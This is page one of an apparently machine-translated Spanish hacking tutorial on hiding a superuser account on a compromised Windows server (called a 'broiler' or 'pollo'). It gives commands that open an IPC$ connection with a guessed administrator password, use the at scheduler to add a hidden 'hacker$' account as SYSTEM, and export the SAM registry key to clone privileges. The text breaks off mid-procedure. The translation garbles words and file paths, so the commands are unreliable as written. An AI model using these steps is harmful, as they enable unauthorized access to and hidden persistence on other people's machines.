Los expertos resumen los métodos que ocultan los superusuarios

Un superusuario es un usuario responsable de administrar y mantener la red. Este término tiene un significado especial en la web de NetWare. El superusuario tiene acceso completo a todos los archivos, directorios y archivos, y es el primer usuario que inicia sesión en el servidor después de la instalación. El superusuario luego cambia inmediatamente la contraseña para que ningún otro usuario pueda acceder al servidor y obtener acceso ilimitado al superusuario. Entonces, ¿cómo ocultarlo en el sistema de superusuario? De aquí en adelante citado para todo el mundo sistema de superusuario oculto en una variedad de métodos
.

En primer lugar, la forma de crear un superusuario oculto

a distancia en la línea de comandos Aquí usaremos el comando at, porque la tarea programada generada con at se ejecuta como el sistema, por lo que no se usa el programa psu.exe. Para poder utilizar el comando at, pollos deben tener un horario para abrir el servicio, si no se abre, las herramientas disponibles Netsvc.exe streamer sc.exe o cámara de aire para iniciar de forma remota, por supuesto, el método puede ser también, siempre y cuando el servicio de programación de inicio en la línea.

En la línea de comandos, puede utilizar una variedad de conexiones, como el uso de MSSQL 1433 puerto de conexión SQLExec también se puede utilizar el servicio telnet, siempre y cuando se puede obtener una cmdshell, y tienen permiso para hacerlo funcionar en el comando Si

1. Primero encuentra un broiler. En cuanto a cómo encontrarlo, no es el tema que mencioné aquí. Aquí asume encontrar un super usuario es administrador y la contraseña es 12345678 pollos de engorde, y ahora que se inicia en la línea de comandos ocultos remota superusuario para ello.
(Ejemplo de un huésped es un huésped en mi área local, voy a cambiar su dirección IP 13.50.97.238 ,, ¿no encasillamiento en Internet, con el fin de evitar el acoso dirección IP normal.)

2 , establecer primero una conexión con el pollo, el comando es: net use 13.50.97.238ipc $ " 12345678 " /usuario: " administrador

3, con el comando at para crear un usuario en la parrilla (si el servicio no se inicia disponible pequeña Netsvc.exe Banyan o sc.exe arrancar remotamente):

a 13.50.97.238 12:51 c: \\ winntsystem32net.exe usuario hacker de $ 1234 /añadir

construir este más $ descansos nombre de usuario, ya que el símbolo $ añadido, la línea de comandos con el usuario de la red no se mostrará al usuario, pero el administrador de cuentas fue capaz de ver a este usuario.

4, en el mismo comando con las claves derivadas HKEY_LOCAL_MACHINEsamsamDomainsaccountusers:

a 13.50.97.238 12:55 c: \\ winntregedit.exe /e hacker.reg

HKEY_LOCAL_MACHINESAMSAMDomainsaccountusers
/e es, en este _LOCAL_MACHINESAMSAMDomainsaccountusers clave debe terminar con. Si es necesario se puede encerrar el y " c: \\ winntregedit.exe /e hacker.reg HKEY_LOCAL_MACHINESAMSAMDomainsaccountusers y " comillas. Anterior12Página siguiente Total 2 páginas